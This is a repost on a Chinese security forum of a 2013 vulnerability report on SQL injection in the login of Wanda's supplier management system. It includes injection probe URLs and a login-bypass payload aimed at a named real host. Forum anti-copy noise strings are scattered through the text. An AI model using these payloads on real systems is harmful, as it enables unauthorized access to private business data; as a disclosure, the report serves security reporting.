找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3179|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。
' P+ x" X  t+ o3 E详细说明:% j9 Y' K/ P/ A) ?# C9 j# A6 ]
万达scm系统登陆框sql注入。4 D9 }+ d' i* J- y
; v: i4 r+ W/ v, \0 h
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27% I; B7 d* o' A& |
3 k8 T0 w2 T3 C, }. Z. R

8 `9 t- k( D6 b3 ]: Y8 f3 a( E) ^500错误。) c$ }7 m$ ]; z; u

- X" |+ L6 G7 {; a2 u用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
3 H7 `7 c# a1 yhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
+ V% N) I& E  x截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)' l, D/ ]0 L/ ]5 q4 L  \6 ?2 F
经过分析,登陆验证的过程应该是:
# q2 x6 t$ k. }$ ^* z* t$ F6 @3 {: p. V  G9 a
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
4 ?. \1 {  D4 n7 rhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png$ h$ i+ _" z7 O1 z. ~# e% F
. A. W$ h7 t1 f* p+ I
oracle数据库,存在注入点。@大连万达,你怎么看?
& ]' ~0 G, R+ {* h: P3 i- Y/ yhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
; o- C5 ^6 |5 \0 k5 l# j) b- ^8 N' }1 w) t
系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。6 W& I& a& q3 H, B- f5 |/ A
漏洞证明:; G0 N4 Y- H. z! w% K& Q) O
万达scm系统登陆框sql注入。
+ `; p- J& m+ c+ e, U, t) x7 E( }9 L) k
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%275 P$ x0 p( g7 G2 L) P! ~. b9 R0 W
4 C# G9 ~: _0 @
6 E% f5 E' z9 ^& G  X/ G
500错误。; i, u+ Y* R) m4 t3 X

% V( J7 J# ?3 Q, v# q& y用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
( t* y8 Y6 d. a3 ?4 y6 C% Zhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png6 V2 j% H3 L  Q/ }0 n1 k8 c3 I, r
: F; Q% @" z4 z; t1 F8 c

1 H; K. y6 N" K' k(截图有一点问题)
( S7 k' j6 z2 Z' h( `5 F! x/ p7 I% z' q4 i* l$ r
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
/ Z" q) Z; T4 C- k) u3 G# v& K5 l  ^5 e! }/ @9 r5 r
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。; h4 {* J- g+ L! g/ T* u6 q; r+ n
* c2 g, e5 P1 B8 g8 ~
绕过:  t1 }/ H; @) ?" e
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1! R2 u5 B6 z- a" L4 |: @/ ]) V

7 j4 R: V& |2 l( Z- B" `: Z! r, x* i$ l% T) K: B
oracle数据库,存在注入点。@大连万达,你怎么看?. \- y: X, Q2 m2 n
​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。& U7 H1 Y, c* I, W

. n$ _5 r; Q! k$ ^修复方案:( M1 h; \6 Q9 w6 N
。。。
  q" p9 }: w) V7 K& T( d
* S, R6 v  A( ~( j. P. v, |3 R+ l
厂商已经确认
' k4 f$ n4 y; \
2 M; q$ ]5 U4 I3 H[/td][/tr]
% h# ]/ z" _8 H# S. r[/table]# u, m& |( Y) p' m5 k( i

' _' n' b. q& D/ g8 f6 X
" u/ Y( ~0 H2 y' O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表